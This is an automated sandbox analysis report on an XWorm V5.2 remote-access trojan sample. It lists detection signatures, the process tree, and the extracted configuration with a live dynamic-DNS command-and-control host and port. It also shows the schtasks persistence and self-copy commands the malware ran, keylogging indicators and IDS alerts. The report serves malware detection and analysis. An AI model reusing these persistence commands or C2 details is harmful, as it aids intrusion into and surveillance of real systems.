Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fresh_shrunk.exe

Overview

General Information

Sample name:fresh_shrunk.exe
Analysis ID:1429324
MD5:745a24a4347a0bb2b9c5e1ba5b2dadeb
SHA1:e89eecdf3bd5a8f34b8933986567cfda2401e17a
SHA256:ad5c027ed298920cd09cefbfcb08bff9b5b55ee1f411ba59f6d1e77677e3bb5c
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • fresh_shrunk.exe (PID: 6860 cmdline: "C:\Users\user\Desktop\fresh_shrunk.exe" MD5: 745A24A4347A0BB2B9C5E1BA5B2DADEB)
    • RegAsm.exe (PID: 6948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • cmd.exe (PID: 6972 cmdline: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6160 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3452 cmdline: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 2196 cmdline: "cmd.exe" /C copy "C:\Users\user\Desktop\fresh_shrunk.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • bddddsx.exe (PID: 3192 cmdline: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe MD5: 745A24A4347A0BB2B9C5E1BA5B2DADEB)
    • RegAsm.exe (PID: 6616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • cmd.exe (PID: 7104 cmdline: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7088 cmdline: "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6612 cmdline: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 2316 cmdline: "cmd.exe" /C copy "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["vbdsg.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7870:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x790d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7a22:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x751e:$cnc4: POST / HTTP/1.1
    00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x1d2ac:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x26fec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x4d24c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1d349:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x27089:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x4d2e9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1d45e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x2719e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x4d3fe:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x1cf5a:$cnc4: POST / HTTP/1.1
      • 0x26c9a:$cnc4: POST / HTTP/1.1
      • 0x4cefa:$cnc4: POST / HTTP/1.1
      00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        10.2.RegAsm.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          10.2.RegAsm.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x7a70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x7b0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x7c22:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x771e:$cnc4: POST / HTTP/1.1
          0.2.fresh_shrunk.exe.287683c.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.fresh_shrunk.exe.287683c.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x5c70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x5d0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x5e22:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x591e:$cnc4: POST / HTTP/1.1
            9.2.bddddsx.exe.2fd0628.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 17 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f, CommandLine: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6160, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f, ProcessId: 3452, ProcessName: schtasks.exe
              Sigma detected: Local Accounts Discovery
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx", CommandLine: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\fresh_shrunk.exe", ParentImage: C:\Users\user\Desktop\fresh_shrunk.exe, ParentProcessId: 6860, ParentProcessName: fresh_shrunk.exe, ProcessCommandLine: "cmd.exe" /C mkdir "C:\Users\user\AppData\Local\Temp\bddddsx", ProcessId: 6972, ProcessName: cmd.exe

              Snort Signatures

              Timestamp:04/21/24-23:26:43.756948
              SID:2852874
              Source Port:8896
              Destination Port:49730
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/21/24-23:23:14.441038
              SID:2855924
              Source Port:49730
              Destination Port:8896
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/21/24-23:27:02.685039
              SID:2852870
              Source Port:8896
              Destination Port:49730
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/21/24-23:27:02.686118
              SID:2852923
              Source Port:49730
              Destination Port:8896
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/21/24-23:26:01.631776
              SID:2853193
              Source Port:49730
              Destination Port:8896
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["vbdsg.duckdns.org"], "Port": "8896", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeReversingLabs: Detection: 55%
              Multi AV Scanner detection for submitted file
              Source: fresh_shrunk.exeReversingLabs: Detection: 55%
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: fresh_shrunk.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpackString decryptor: vbdsg.duckdns.org
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpackString decryptor: 8896
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpackString decryptor: <123456789>
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpackString decryptor: <Xwormmm>
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpackString decryptor: XWorm V5.2
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpackString decryptor: USB.exe
              Source: fresh_shrunk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: fresh_shrunk.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 57.128.155.22:8896 -> 192.168.2.4:49730
              Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 57.128.155.22:8896 -> 192.168.2.4:49730
              Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 57.128.155.22:8896
              Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49730 -> 57.128.155.22:8896
              Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49730 -> 57.128.155.22:8896
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: vbdsg.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: vbdsg.duckdns.org
              Yara detected Generic Downloader
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPE
              Source: global trafficTCP traffic: 192.168.2.4:49730 -> 57.128.155.22:8896
              Source: Joe Sandbox ViewIP Address: 57.128.155.22 57.128.155.22
              Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownDNS traffic detected: queries for: vbdsg.duckdns.org
              Source: RegAsm.exe, 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.fresh_shrunk.exe.287683c.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 9.2.bddddsx.exe.2fd0628.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.fresh_shrunk.exe.288057c.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 9.2.bddddsx.exe.2fc68e8.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\fresh_shrunk.exeCode function: 0_2_02718030 CreateProcessAsUserA,0_2_02718030
              Source: C:\Users\user\Desktop\fresh_shrunk.exeCode function: 0_2_027150D00_2_027150D0
              Source: C:\Users\user\Desktop\fresh_shrunk.exeCode function: 0_2_027159A00_2_027159A0
              Source: C:\Users\user\Desktop\fresh_shrunk.exeCode function: 0_2_02714D880_2_02714D88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02D10ED01_2_02D10ED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02D1D4DC1_2_02D1D4DC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02DDB6781_2_02DDB678
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02DDBF481_2_02DDBF48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02DDE6381_2_02DDE638
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02DD07381_2_02DD0738
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02DDB3301_2_02DDB330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02DD71A91_2_02DD71A9
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeCode function: 9_2_015159A09_2_015159A0
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeCode function: 9_2_015150D09_2_015150D0
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeCode function: 9_2_01514D889_2_01514D88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_02E50EC010_2_02E50EC0
              Source: fresh_shrunk.exe, 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient5.2spread.exe4 vs fresh_shrunk.exe
              Source: fresh_shrunk.exe, 00000000.00000000.1669872052.00000000005D6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBootstrapper.exeB vs fresh_shrunk.exe
              Source: fresh_shrunk.exe, 00000000.00000002.1676771101.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fresh_shrunk.exe
              Source: fresh_shrunk.exeBinary or memory string: OriginalFilenameBootstrapper.exeB vs fresh_shrunk.exe
              Source: fresh_shrunk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.fresh_shrunk.exe.287683c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 9.2.bddddsx.exe.2fd0628.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.fresh_shrunk.exe.288057c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 9.2.bddddsx.exe.2fc68e8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: fresh_shrunk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: bddddsx.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/5@1/1
              Source: C:\Users\user\Desktop\fresh_shrunk.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fresh_shrunk.exe.logJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\GgQUWuMVOC7DAikW
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bddddsxJump to behavior
              Source: fresh_shrunk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: fresh_shrunk.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\fresh_shrunk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
